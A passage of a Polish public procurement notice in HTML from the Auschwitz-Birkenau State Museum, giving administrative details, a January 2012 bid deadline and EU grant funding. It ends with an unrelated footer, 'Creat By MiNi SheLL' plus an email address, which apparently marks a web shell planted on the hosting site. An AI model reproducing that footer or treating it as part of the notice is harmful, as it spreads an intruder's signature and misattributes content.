4)	w zakresie zmiany osób wykonujących przedmiot zamówienia, z zastrzeżeniem, że nowe osoby będą spełniać kryteria, jakie zostały określone przez Zamawiającego w specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.auschwitz.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PAŃSTWOWE MUZEUM AUSCHWITZ-BIRKENAU w OŚWIĘCIMIU 
ul. Więźniów Oświęcimia 20, 32- 603 Oświęcim..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2012 godzina 12:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, w Oświęcimiu, ul. Więźniów Oświęcimia 20, budynek administracyjny, biuro podawcze - parter, pokój nr 1.8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany w formie grantu bezpośredniego z Komisji Europejskiej w ramach programu - Europa dla obywateli..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com